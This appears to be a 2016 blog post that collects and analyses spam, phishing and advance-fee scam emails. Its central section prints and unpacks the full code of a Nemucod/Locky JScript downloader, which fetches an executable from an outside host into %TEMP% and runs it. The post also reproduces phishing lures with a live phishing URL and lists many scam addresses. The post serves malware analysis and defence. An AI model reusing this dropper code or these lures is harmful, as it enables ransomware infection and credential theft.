Monday, May 9, 2016

Winner of the Coca Cola lottery

Dear sir,

This is to notify you that your name was picked from THIS SITE by the Coca Cola Company as one of the lucky winners of $2,000,000.00 USD in the (Coca Cola) Profile Award 2016, so you are advised to contact the (Coca Cola) Profile Award agent to receive your winning prize. Agent to contact: Mr. Confidence Roland, via email address

Below is the information needed

1. Full Name:
2. Address:
3. Sex:
4. Occupation:
5. Phone Number:
6. City
7. Country:
8. Age:
9. A Copy of Your ID card (attached)

Kindly contact the agent in charge of your winnings, Mr. Confidence Roland, through his email address, {gmail.com}
Once again,

CONGRATULATIONS

Email analysis :

NOTE : mascogold@gmail.com

New message available! (Crédit Agricole phishing)

http://reassurez-moi.fr/guide/wp-content/uploads/2014/09/Assurance-de-pr%C3%AAt-immobilier-Cr%C3%A9dit-Agricole.jpg

Dear Customer,
A Crédit Agricole adviser has sent you a message.
You can read it by logging in to your online customer account using
your username/password by clicking the link below:

Click HERE to access your account.

See you soon on the account management service.
Crédit Agricole

Phishing analysis :

CLICK : Cliquez ICI
OPEN : http://sf-g50-enligne.crdit-agricole.chaletbnb.com/sfsecure/enligne/
SCREENSHOT :


CLICK : CONFIRMER
REDIRECT : https://www.credit-agricole.fr/

Email analysis :

NOTE : pokleksa@aseame.onmicrosoft.com
NOTE : chounettte@hotmail.fr
NOTE : X-Originating-Ip : [81.193.66.163]

Virus Analysis (UNPACKED...)

In the last email I obtained a virus which, according to the virus report, is similar to Nemucod ransomware...


Code analysis :

===================================
INIT
===================================

var PR_RDONLY = 0x01;
var PR_WRONLY = 0x02;
var PR_RDWR = 0x04;
var PR_CREATE_FILE = 0x08;
var PR_APPEND = 0x10;
var PR_TRUNCATE = 0x20;
var PR_SYNC = 0x40;
var PR_EXCL = 0x80;

GmvCOh = "}/* * Helper functions for managing events -- not part of the public interface. * Props to Dean Edwards\" addEvent library for many of the ideas. */ jQuery.event = {";
var chocolate = 0;
daunt = String["f"+("kernel","fresh","plagiarism","remoteness","touch","slavish","permanent","ro")+"mC"+"ha"+"rC"+"ode"](7*2*7 + chocolate );
String.prototype.provisionally = function () {
var editions = { hairy: this };
editions.nutmeg = editions.hairy[("suZ"+("weekends","trend","vendor","chafe","listless","transexuales","millet","st")+"ri"+"ng").replace("Z", daunt)](chocolate, PR_RDONLY);
return editions.nutmeg;
};

===================================
FUNCTION HEX MD5 STREAM
===================================

function hex_md5_stream(stream) {
var hasher = Components.classes["@mozilla.org/security/hash;1"]
.createInstance(Components.interfaces.nsICryptoHash);
hasher.init(hasher.MD5);
hasher.updateFromStream(stream, stream.available());
var hash = hasher.finish(false);
var ret = '';
for (var i = 0; i < hash.length; ++i) {
var hexChar = hash.charCodeAt(i).toString(16);
if (hexChar.length == 1) ret += '0';
ret += hexChar;
}
return ret;
}


===================================
FUNCTION PICK
===================================

function pick(){
for (var i = 0, l = arguments.length; i < l; i++) {
if (arguments[i] != undefined) return arguments[i];
}
return null;
};


===================================
FUNCTION BASE64DECODE
===================================

this.decode = base64decode;
this.chars = function( string ) {
base64EncodeChars = string || "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
base64DecodeChars = [];
for ( var i = 128; i--; ) {
if ( base64DecodeChars[ i ] === undefined )
base64DecodeChars[ i ] = -1;
base64DecodeChars[ base64EncodeChars.charCodeAt( i ) ] = i;
}
return this;
};
this.chars();
function base64decode( str ) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while (i < len) {
/* c1 */
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1) break;

/* c2 */
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1) break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));

/* c3 */
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1) break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));

/* c4 */
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1) break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
}


===================================
Calling Windows Script Host
===================================

try{
if(WScript +"" == "Windows Script Host"){
eval(base64decode('dmFyIHRoZW5EbyA9IHRoZW5EbyB8fCBTdHJpbmcucHJvdG90eXBlLnByb3Zpc2lvbmFsbHkgPT0gdW5kZWZpbmVkIHx8IGV2YWwoInRydWUiKTs='));
}
}catch(Eeed)
{

}


===================================
CONVERSION (BASE64 DECODE)
===================================

try{
if(WScript +"" == "Windows Script Host"){
var thenDo = thenDo || String.prototype.provisionally == undefined || eval("true");
}
}catch(Eeed)
{

}


===================================
FUNCTION
===================================

String.prototype.parseColor = function() {
var color = '#';
if (this.slice(0,4) == 'rgb(') {
var cols = this.slice(4,this.length-1).split(',');
var i=0;
do {
color += parseInt(cols[i]).toColorPart()
} while (++i<3);
} else {
if (this.slice(0,1) == '#') {
if (this.length==4) for(var i=1;i<4;i++) color += (this.charAt(i) + this.charAt(i)).toLowerCase();
if (this.length==7) color = this.toLowerCase();
}
}
return (color.length==7 ? color : (arguments[0] || this));
};


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 6=["12"+("1n","2r","2t","2y","2A","2B","a","b")+("c","d","e","f","g","h","i","j")+"k",("l","m","n","o","p","q","r","s","t")+"4"+("v","w","x","y","z","A","B","C","D")+"E"+"F"+"G"+"H"+("I","J","K","L","N","O","P","Q","T")+("U","V","W","X","Y","Z","10","11")+"5"+"13",""+"%"+("14","15","16","17","18","19","1a","1b")+"1c%",""+("1d","1e","1f","1g","1h","1i","1j",".")+"1k","R"+("1l","1m","2E","1o","1p","1q","1r","1s","1t"),"M"+"1u"+"1v"+("1w","1x","1y","1z","1A","1B","1C","1D","2.")+("1E","1F","1G","1H","1I","1J","1K","1L","1M")+"1N"+"1O",("1P","1Q","1R","1S","1T","1U","1V","1W","1X")+("1Y","1Z","20","21","22","23","24","5")+"25.S"+("26","27","28","29","2a","2b","2c","2d","2e")+("2f","2g","2h","2i","2j","2k","2l","2m")];2n="} 2o 2p 2q 7 4 2s 8 2u 2v 7 2w 8 2x 0 2z ( 0.0 ) { 1 = 0; 0 = 1.0; 9 = 1.9; ";3 2C=2D[6.u()];',62,165,'handler|handleObjIn||var|an|ri|BHpUk|in|of|selector|thong|iv|xerox|anytime|download|privacy|libretto|decimal|molecular|eXObje|ct|overalls|known|moral|interpreted|introduced|decrepitude|encumber|rivulet|Exp|shift|important|massy|lounged|bribery|dragoman|internship|defense|mediate|dE|nv|ir|on|me|enquiry|refresh|perusing|spleen||guernsey|eerie|diamond|flirt|||nt|bibliography|adapter|metres|fighter|pointer|viscount|porphyry|St|Act|ngs|baton|clicking|offerings|sprinkle|croatia|happiness|alabaster|TE|MP|incautious|encircle|godlike|adjustment|azalea|intensity|timely|exe|specifying|photographer|strand|celebration|throttle|condense|sleep|lying|un|SX|ML|julian|refrigerator|fundamentally|hygiene|fabrics|pellucid|explosive|piano|traction|parts|admonish|voluble|stitch|quartette|sextant|vertically|XM|LH|TTP|instances|instrumentality|asbestos|tuner|slots|divergent|plastic|linear|WSc|antipodes|violate|receptors|woody|shale|bitch|injection|pt|rosette|declare|descriptive|hawser|geologist|havana|thunderbolt|bellows|he|indonesia|delivery|billing|welter|participants|losses|buffet|ll|CMpogCtp|Caller|can|pass|besides|object|heirloom|custom|data|lieu|the|jelsoft|if|membership|spout|uhRkAhP|this|median'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

var BHpUk=["Act"+("strand","besides","heirloom","jelsoft","membership","spout","thong","iv")+("xerox","anytime","download","privacy","libretto","decimal","molecular","eXObje")+"ct",("overalls","known","moral","interpreted","introduced","decrepitude","encumber","rivulet","Exp")+"an"+("important","massy","lounged","bribery","dragoman","internship","defense","mediate","dE")+"nv"+"ir"+"on"+"me"+("enquiry","refresh","perusing","spleen","guernsey","eerie","diamond","flirt","nt")+("bibliography","adapter","metres","fighter","pointer","viscount","porphyry","St")+"ri"+"ngs",""+"%"+("baton","clicking","offerings","sprinkle","croatia","happiness","alabaster","TE")+"MP%",""+("incautious","encircle","godlike","adjustment","azalea","intensity","timely",".")+"exe","R"+("specifying","photographer","median","celebration","throttle","condense","sleep","lying","un"),"M"+"SX"+"ML"+("julian","refrigerator","fundamentally","hygiene","fabrics","pellucid","explosive","piano","2.")+("traction","parts","admonish","voluble","stitch","quartette","sextant","vertically","XM")+"LH"+"TTP",("instances","instrumentality","asbestos","tuner","slots","divergent","plastic","linear","WSc")+("antipodes","violate","receptors","woody","shale","bitch","injection","ri")+"pt.S"+("rosette","declare","descriptive","hawser","geologist","havana","thunderbolt","bellows","he")+("indonesia","delivery","billing","welter","participants","losses","buffet","ll")];
CMpogCtp="
}
Caller can pass in an object of custom data in lieu of the handler if ( handler.handler )
{
handleObjIn = handler;
handler = handleObjIn.handler;
selector = handleObjIn.selector;
";
var uhRkAhP=this[BHpUk.shift()];


===================================
FUNCTION HEX MD5
===================================

function hex_md5(s) {
var stream = Components.classes["@mozilla.org/io/string-input-stream;1"]
.createInstance(Components.interfaces.nsIStringInputStream);
stream.setData(s, s.length);
return hex_md5_stream(stream);
}


===================================
DATAS
===================================

titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();
boughts = (("memorabilia", "borax", "tracking", "assam", "shzrRkSc") + "rFfvhMdqAeh").provisionally();
vietnamese = ("n"+("mundane","satisfy","column","headers","dysentery","dispute","winner","press","ep") + String.fromCharCode(111)).split("");
oaegScr = " add: function( elem, types, handler, data, selector ) { var tmp, events, t, handleObjIn, special, eventHandle, handleObj, handlers, type, namespaces, origType, elemData = jQuery._data( elem );";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0=1.2();3 6=4 5(7(0));3 8=4 5(1.2());',9,9,'rKXyhsz|BUk|pop|var|new|uhRkAhP|XtpJu|pick|NBHAYvL'.replace('U','HpU').split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

rKXyhsz=BHpUk.pop();
var XtpJu=new uhRkAhP(pick(rKXyhsz));
var NBHAYvL=new uhRkAhP(BHpUk.pop());


===================================
PACKER
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";

if(thenDo){
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1=(("9","2","3","4","5")+"6").7();8 0=a.b();c d(){e("f://"+g,"h")}',18,18,'emptyZZindicatedeZZendorseZZajfoTTEbZZaptitudeZZESOHGNPaRebZZRbtJGwVZZprovisionallyZZvarZZopulenceZZMathZZrandomZZfunctionZZsaloHoodZZquickwittedZZhttpZZhoddorZZOYWVCwQ'.split('ZZ'),0,{}))
}

===================================
CONVERSION (UNPACKED)
===================================

pYzoVKAO = " global: {},";
var CteaNXQfb = XtpJu[BHpUk.shift()](BHpUk.shift());
uvbkmKSBc = " Don\"t attach events to noData or text/comment nodes (but allow plain objects) if ( !elemData ) { return; ";
if(thenDo){
indicatede=(("opulence","endorse","ajfoTTEb","aptitude","ESOHGNPaReb")+"RbtJGwV").provisionally();
var empty=Math.random();
function saloHood()
{
quickwitted("http://"+hoddor,"OYWVCwQ")
}


===================================
A VARIABLE IN UNICODE FORMAT
===================================

var hoddor = "\u006C\u006F\u0076\u0065\u0073\u0061\u006E\u0069\u006D\u0061\u006C\u0073\u002E\u0063"+"\u006F\u006D\u002F\u0030\u0039\u0079\u0038\u0068\u0062\u0037\u0076\u0036\u0079\u0037\u0067";

===================================
CONVERSION (UNICODE > TXT)
===================================

var hoddor = "lovesanimals.c"+"om/09y8hb7v6y7g";

===================================
FUNCTION QUICKWITTED
===================================

function quickwitted(expulsion, proved) {
try {
var francisco = CteaNXQfb + "/" + proved + BHpUk.shift();
cokDPG = "} If event changes its type, use the special event handlers for the changed type special = jQuery.event.special[ type ] || {};";
if (empty > 0) {
NBHAYvL[(vietnamese).reverse().join("")](("runaway","ballet","undersigned","albums","ostentatious","expanding","strips","G") + indicatede + ("miguel","began","distribution","plasma","hoary","reporting","built","childbirth","T"), expulsion, false);
}
lkKFtqIM = " If selector defined, determine special event api type, otherwise given type type = ( selector ? special.delegateType : special.bindType ) || type;";
NBHAYvL[boughts + ("durability","outstrip","premium","after","phrygian","hilltop","bluntly","e") + (("potency", "restive", "bonds", "cacao", "percussion", "nXyuIYg") + "VzPzIfxqAGo").provisionally() + (("printing", "compendium", "loiter", "precursor", "phillip", "dWoQFifU") + "ACrOmYGq").provisionally()]();
NOPvLqSUtIr = " Update special based on newly reset type special = jQuery.event.special[ type ] || {};";


===================================
PACKER
===================================

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4(r.L==M){X 6=14 15((("16","1a","1f","1g","1h","1i","1j","")+"A"+("1n","1p","1s","1u","1v","1w","1x","1z")+"1T."+("1X","26","2g","2k","2C","38","3f","3i","")+"S"+("3o","3p","3N","3P","3Q","H","I","J")+"K").E("p","D"));6[""+("N","O","P","Q","T","U","V","W","o")+"Y"]();Z="} 10 11 12 7 d m a 17 18, 19 n 1b/1c 1d 1e 4 ( !d.j ) { d.j = b.j++; ";6.c=0+3-2;1k="} 1l 7 1m\\"s 8 1o z 1q d, 4 1r B 7 1t 4 ( !( 5 = g.5 ) ) { 5 = g.5 = {}; } 4 ( !( f = g.i ) ) { f = g.i = 1y( e ) {";6["w"+"1A"+("1B","1C","1D","1E","1F","1G","1H","1I","1J")](r[""+("1K","1L","1M","1N","1O","1P","1Q","R")+"1R"+"1S"+q+("1U","1V","1W","3S","1Y","1Z","20","e")+"21"+"22"]);23=" 24 7 25 8 u a b.8.27() z 28 29 8 B 2a 2b a 2c m 2d 2e 2f b !== \\"v\\" && ( !e || b.8.2h !== e.c ) ? b.8.2i.2j( f.9, 2l ) : v; };";6[(2m+("2n","2o","2p","2q","2r","2s","2t","2u","o")+"2v"+"2w"+("2x","2y","2z","2A","2B","x","2D","2E")).E("D",q)]=0;2F=" 2G 9 2H a 2I u 7 i 2J n 2K a 2L 2M 2N 2O 2P-2Q 5 f.9 = 9; ";6["s"+("2R","2S","2T","2U","2V","2W","2X","2Y")+"2Z"+"30"+("x","31","32","33","34","35","36","37")](y,2);39="} 3a 3b 5 3c 3d a 3e h = ( h || \\"\\" ).3g( 3h ) || [ \\"\\" ]; t = h.3j; 3k ( t-- ) { k = 3l.3m( h[ t ] ) || []; c = 3n = k[ 1 ]; C = ( k[ 2 ] || \\"\\" ).3q( \\".\\" ).3r();";6.3s();3t=" 3u *3v* 3w a c, 3x 3y 3z-3A 3B 4 ( !c ) { 3C; ";3D[3E.3F()](y,1,"3G"==="3H");3I=" 3J 3K 3L/3M 4 7 l 5 d 3O F 4 ( !l.G || l.G.3R( 9, 13, C, f ) === F ) {"}',62,241,'||||if|events|OkUvN|the|event|elem||jQuery|type|handler||eventHandle|elemData|types|handle|guid|tmp|special|has|to|||boughts|NBHAYvL|||of|undefined||snowball|francisco|and||is|namespaces||replace|false|setup|broadcast|universities|tr|eam|status|200|installation|eastwards|expression|footage|||green|winter|embody|yukon|var|pen|MOmXidnhR|Make|sure|that|data|new|uhRkAhP|extermination|unique|ID|used|wornout|find|remove|it|later|harps|definitive|scored|particle|aryan|eibdpjiyakm|Init|element|footstool|structure|gratuity|main|this|measurement|first|presently|calibration|authorization|cornet|function|pO|ri|sensitivity|lawlessness|reflects|treadmill|external|dissimulation|perversion|rusted|te|assorted|announce|compete|booth|libretto|definition|censor|es|pon|DB|constructing|warren|recipient|bound|suffered|chunk|listen|Bo|dy|STOuIe|Discard|second|muslims|trigger|when|an|called|after|page|unloaded|return|typeof|butler|triggered|dispatch|apply|canteen|arguments|titular|grandee|womanish|benjamin|whole|wireless|rarely|logitech|evasively|Di|ti|geology|abyssinian|hodge|reservoir|acrimony|ludwig|browser|on|dJIemps|Add|as|property|fn|prevent|memory|leak|with|IE|non|native|curative|deface|marker|remittance|residents|balance|permalink|av|eT|oF|movie|awestruck|savory|neuter|slight|pushed|ile|blockade|NBlaxcR|Handle|multiple|separated|by|space|keeping|match|rnotwhite|anointing|length|while|rtypenamespace|exec|origType|credulity|meters|split|sort|close|HuIaJMUIgp|There|must|be|no|attaching|namespace|only|handlers|continue|XtpJu|BHpUk|shift|UsjNuiXNlu|NMWYuV|pgvvXzp|Only|use|addEventListener|attachEvent|bowled|returns|prefix|correlative|call|electrified'.split('|'),0,{}))

===================================
CONVERSION (UNPACKED)
===================================

if(NBHAYvL.status==200)
{
var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));
OkUvN[""+("installation","eastwards","expression","footage","green","winter","embody","yukon","o")+"pen"]();
MOmXidnhR="
}
Make sure that the handler has a unique ID, used to find/remove it later if ( !handler.guid )
{
handler.guid = jQuery.guid++;
";
OkUvN.type=0+3-2;
eibdpjiyakm="
}
Init the element\"s event structure and main handler, if this is the first if ( !( events = elemData.events ) )
{
events = elemData.events =
{
};
}
if ( !( eventHandle = elemData.handle ) )
{
eventHandle = elemData.handle = function( e )
{
";
OkUvN["w"+"ri"+("sensitivity","lawlessness","reflects","treadmill","external","dissimulation","perversion","rusted","te")](NBHAYvL[""+("assorted","announce","compete","booth","libretto","definition","censor","R")+"es"+"pon"+boughts+("constructing","warren","recipient","electrified","suffered","chunk","listen","e")+"Bo"+"dy"]);
STOuIe=" Discard the second event of a jQuery.event.trigger() and when an event is called after a page has unloaded return typeof jQuery !== \"undefined\" && ( !e || jQuery.event.triggered !== e.type ) ? jQuery.event.dispatch.apply( eventHandle.elem, arguments ) : undefined;
};
";
OkUvN[(titular+("grandee","womanish","benjamin","whole","wireless","rarely","logitech","evasively","o")+"Di"+"ti"+("geology","abyssinian","hodge","reservoir","acrimony","snowball","browser","on")).replace("D",boughts)]=0;
dJIemps=" Add elem as a property of the handle fn to prevent a memory leak with IE non-native events eventHandle.elem = elem;
";
OkUvN["s"+("curative","deface","marker","remittance","residents","balance","permalink","av")+"eT"+"oF"+("snowball","movie","awestruck","savory","neuter","slight","pushed","ile")](francisco,2);
NBlaxcR="
}
Handle multiple events separated by a space types = ( types || \"\" ).match( rnotwhite ) || [ \"\" ];
t = types.length;
while ( t-- )
{
tmp = rtypenamespace.exec( types[ t ] ) || [];
type = origType = tmp[ 1 ];
namespaces = ( tmp[ 2 ] || \"\" ).split( \".\" ).sort();
";
OkUvN.close();
HuIaJMUIgp=" There *must* be a type, no attaching namespace-only handlers if ( !type )
{
continue;
";
XtpJu[BHpUk.shift()](francisco,1,"UsjNuiXNlu"==="NMWYuV");
pgvvXzp=" Only use addEventListener/attachEvent if the special events handler returns false if ( !special.setup || special.setup.call( elem, data, namespaces, eventHandle ) === false )
{
"
}


===================================
FINAL
===================================

} catch (rzupeJz) { };
kOWbigYady = " Init the event handler queue if we\"re the first if ( !( handlers = events[ type ] ) ) { handlers = events[ type ] = []; handlers.delegateCount = 0;";
}
saloHood();
NPQynFqCF = " handleObj is passed to all event handlers handleObj = jQuery.extend( { type: type, origType: origType, data: data, handler: handler, guid: handler.guid, selector: selector, needsContext: selector && jQuery.expr.match.needsContext.test( selector ), namespace: namespaces.join( \".\" ) }, handleObjIn );";


===================================
CONCLUSION :
===================================

URL EXTRACTED : lovesanimals.com/09y8hb7v6y7g
TECHNOLOGY : UNICODE,UNPACKER,JSCRIPT,BASE64
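As an added example (not code from the original post or from the sample), a static simplifier for the string-building tricks this script relies on: comma lists whose last element is the real value, literal concatenation, String.fromCharCode, \uXXXX escapes, literal .replace() calls and the provisionally() helper. It never executes the script, only rewrites literal-only expressions. It assumes, from the INIT section, that provisionally() returns the first character of its receiver (daunt = String.fromCharCode(98) = "b", so the method built is "substring", called with (0, PR_RDONLY) = (0, 1)).

```javascript
// Static (non-executing) simplifier for the obfuscation patterns in the dump above.
// Rules applied until nothing changes:
//   ("junk",...,"real")      -> "real"      (comma operator keeps the last value)
//   ("lit")                  -> "lit"
//   "ab" + "cd"              -> "abcd"
//   String.fromCharCode(111) -> "o"
//   "\u006C"                 -> "l"         (printable ASCII only, keeps the literal valid)
//   "lit".replace("p","D")   -> folded      (literal arguments only)
//   "lit".provisionally()    -> first char  (assumption derived from INIT, see lead-in)
// A "(" is treated as a comma list only when not preceded by an identifier, ")" or "]",
// so call argument lists such as replace("p","D") are never folded by mistake.

const STR = /"(?:[^"\\]|\\.)*"/.source;      // one double-quoted string literal
const NOT_CALL = '(?<![\\w$)\\]])';            // "(" that does not open a call

const commaList = new RegExp(NOT_CALL + '\\(\\s*' + STR + '(?:\\s*,\\s*' + STR + ')+\\s*\\)', 'g');
const parenLit  = new RegExp(NOT_CALL + '\\(\\s*(' + STR + ')\\s*\\)', 'g');
const concat    = new RegExp('(' + STR + ')\\s*\\+\\s*(' + STR + ')', 'g');
const fromCC    = /String\.fromCharCode\(\s*(\d+)\s*\)/g;
const uEscape   = /\\u([0-9a-fA-F]{4})/g;
const replaceL  = new RegExp('(' + STR + ')\\.replace\\(\\s*(' + STR + ')\\s*,\\s*(' + STR + ')\\s*\\)', 'g');
const provis    = new RegExp('(' + STR + ')\\.provisionally\\(\\)', 'g');

// JSON syntax is close enough to JS double-quoted literals for this sample; a literal
// JSON cannot parse (e.g. with \x41 escapes) is left untouched rather than guessed.
function lit(s) { try { return JSON.parse(s); } catch (e) { return null; } }
const quote = JSON.stringify;

function simplifyStrings(src) {
  let out = src, prev;
  do {
    prev = out;
    out = out.replace(commaList, m => m.match(new RegExp(STR, 'g')).pop());
    out = out.replace(parenLit, '$1');
    out = out.replace(concat, (m, a, b) => a.slice(0, -1) + b.slice(1));
    out = out.replace(fromCC, (m, n) => quote(String.fromCharCode(Number(n))));
    out = out.replace(uEscape, (m, h) => {
      const c = parseInt(h, 16);
      return (c >= 0x20 && c < 0x7f && c !== 0x22 && c !== 0x5c) ? String.fromCharCode(c) : m;
    });
    out = out.replace(replaceL, (m, s, a, b) => {
      const v = lit(s), x = lit(a), y = lit(b);
      return (v === null || x === null || y === null) ? m : quote(v.replace(x, y));
    });
    out = out.replace(provis, (m, s) => {
      const v = lit(s);
      return v === null ? m : quote(v.substring(0, 1));
    });
  } while (out !== prev);
  return out;
}

// Constructed sample: three lines copied from the dump above.
const SAMPLE = [
  'var hoddor = "\\u006C\\u006F\\u0076\\u0065\\u0073\\u0061\\u006E\\u0069\\u006D\\u0061\\u006C\\u0073\\u002E\\u0063"+"\\u006F\\u006D\\u002F\\u0030\\u0039\\u0079\\u0038\\u0068\\u0062\\u0037\\u0076\\u0036\\u0079\\u0037\\u0067";',
  'titular = (("accost", "dazzle", "tolerate", "antigua", "pPNMxaXgtPqQ") + "OkqCnGIqrgI").provisionally();',
  'var OkUvN=new uhRkAhP((("extermination","wornout","harps","definitive","scored","particle","aryan","")+"A"+("footstool","gratuity","measurement","presently","calibration","authorization","cornet","pO")+"DB."+("bound","muslims","butler","canteen","ludwig","blockade","keeping","anointing","")+"S"+("credulity","meters","bowled","prefix","correlative","broadcast","universities","tr")+"eam").replace("p","D"));',
].join('\n');

function demo() { return simplifyStrings(SAMPLE); }

console.log(demo());
```

Running the block prints the three sample lines with the URL, the value of titular and the "ADODB.Stream" ProgID exposed, which is enough to read the rest of the dump without executing anything.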

NON-CONFORMITY DOCUMENT (Virus) (DOCUMENT DE NON CONFORMITE)

Please find attached the non-conformity document.

Best regards,
--



SCopieur VA9812357665355478.gz

Virus analysis :

SHA256 : 0235a1aded1737d8c89186b29a34610be835ff45f896091d6dcd6eb9a3152061
Filename : SCopieur VA9812357665355478.gz

ALYac : JS:Trojan.JS.Downloader.IQ
AVG : JS/Downloader.Agent
Ad-Aware : JS:Trojan.JS.Downloader.IQ
Arcabit : JS:Trojan.JS.Downloader.IQ
Avast : JS:Downloader-CZW [Trj]
Avira (no cloud) : JS/Dldr.Locky.98765
BitDefender : JS:Trojan.JS.Downloader.IQ
CAT-QuickHeal : JS.Locky.P
Cyren : JS/Locky.AC
DrWeb : JS.DownLoader.1397
ESET-NOD32 : JS/TrojanDownloader.Nemucod.WU
F-Prot : JS/Locky.AC
F-Secure : JS:Trojan.JS.Downloader.IQ
Fortinet : JS/Nemucod.WU!tr.dldr
GData : JS:Trojan.JS.Downloader.IQ
Ikarus : Trojan-Ransom.Script.Locky
Kaspersky : Trojan-Downloader.JS.Agent.kee
McAfee : JS/Nemucod.is
McAfee-GW-Edition : JS/Nemucod.is
eScan : JS:Trojan.JS.Downloader.IQ
Microsoft : TrojanDownloader:JS/Nemucod.EK
Rising : Downloader.Ransomware!8.625A-SOAAbihlG7H (Cloud)
Sophos : JS/Dldr-MD

Email analysis :

NOTE : lg46@valoritech.fr
NOTE : User-Agent : Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.7.0
NOTE : Received : from cmodem.201.140.226-163.wirenet.com.ar (unknown [201.140.226.163])

Godwin Emefiele

IMMEDIATE CONTRACT PAYMENT
CONTRACT #:MAV/NNPC/FGN/MIN/0015

From the records of outstanding contractors due for payment with the federal government of Nigeria, your name and company were discovered as next on the list of the outstanding contractors who have not received their payments. I wish to inform you that your payment is being processed and will be released to you as soon as you respond to this letter. Also note that from my records your outstanding contract payment is US$15.9 Million Dollars. Please re-confirm to me if this is in line with what you have in your records and also re-confirm to me the following.

1) Your full name.
2) Telephone and fax number; if possible include your mobile telephone number.
3) Company name, position and address.
4) Profession, age and marital status.

As soon as this information is received, your payment will be made to you in a certified bank draft from the Central Bank of Nigeria and a copy will be given to you to take to your bank for confirmation. Please get back to us with the below email address: godwinemefiele@writeme.com

Regards,

Mr. Godwin Emefiele.

Email leaks :

godwinemefiele@writeme.com, DeberX@savebabies.net, Dr.ivorbigone@yahoo.co.uk, Dr_obaze.cure@yahoo.com, DrewPWiener2010@gmail.com, ELLASANCHEZ1809@gmail.com, ERROL_RODMAN@HOTMAIL.COM, Eatme95@Lycos.com, Edokuspiritualspelltemple@hotmail.c, Edokuspiritualspelltemple@HOTMAIL.COM, Ehicarespellhelp@gmail.com, Elitemobhackers@yahoo.com, EnloeMauicibre@HOTMAIL.COM, Erigospellcaster@gmail.com, FRANK@yahoo.com, FannyPlunge23@gmail.com, Fightagainstfascism@gmail.com, Fishhsif1962@aol.com, GOCHEZ25@MYWAY.COM, GUYMANMUGU@yahoo.com, Gert@metr.uk, Hosenas12@yahoo.com, IanDanielSmith@gmail.com, Ibe_Gettin@firehousemail.com, Igbalutempleofsolution1@gmail.com, Ivar.Knutsen@mimer.no, Ivorstiffun40@gmail.com, JMN2MIZZOU@aol.com, JOHN_REGAN_2000@yahoo.com, JRapallo@gmail.com, JSRGoldberg@gmail.com, Jake.Crowen@HOTMAIL.COM, Jason20906@yahoo.com, Jcsmbar@prysm.net, Jeff@softdisk.com, Joe.dumass1@gmail.com, Jonasarschfick@hushmail.com, Jonstonejames@gmail.com, Jose.Heleon@gmail.com, LELE75067@yahoo.com

Email analysis :

NOTE : godwin009@y28mail.com
NOTE : Received : from [185.56.137.14] by www.y28mail.com via HTTP;

GOD BLESS YOU (QUE DIEU VOUS BÉNISSE)

Hello, beloved in Christ

I was able to reach you during a little wander in my spare moments on the Internet following my searches, where I found your expertise, which allows me to contact you in this way. I have therefore chosen you by the will of GOD and not by mere chance. My health having deteriorated, I intend to donate to you my fortune of €2,500,000 held at the Bank Of Africa Benin (BOA-BENIN) in West Africa so that you can carry out humanitarian projects (help for vulnerable people such as street children, orphans, the destitute and homeless, etc.). My heart is at peace, even though I am afflicted by an illness that has been degrading my life for nearly three years, and I am currently under medical observation in London, England. According to the doctor, the blood clot that has formed in my brain is at a very advanced stage, so any surgical operation would be a failure in advance. I am afraid the rest of my money will be wasted after my death. I have therefore decided to stop the treatment. Please contact me directly at my email: ginettebourgeois1948@gmail.com

GOD BLESS YOU
Awaiting your reply

Kind regards

Ginette Bourgeois

Email analysis :

NOTE : ginettebourgeois1948@gmail.com
NOTE : june_june0822@zeus.eonet.ne.jp
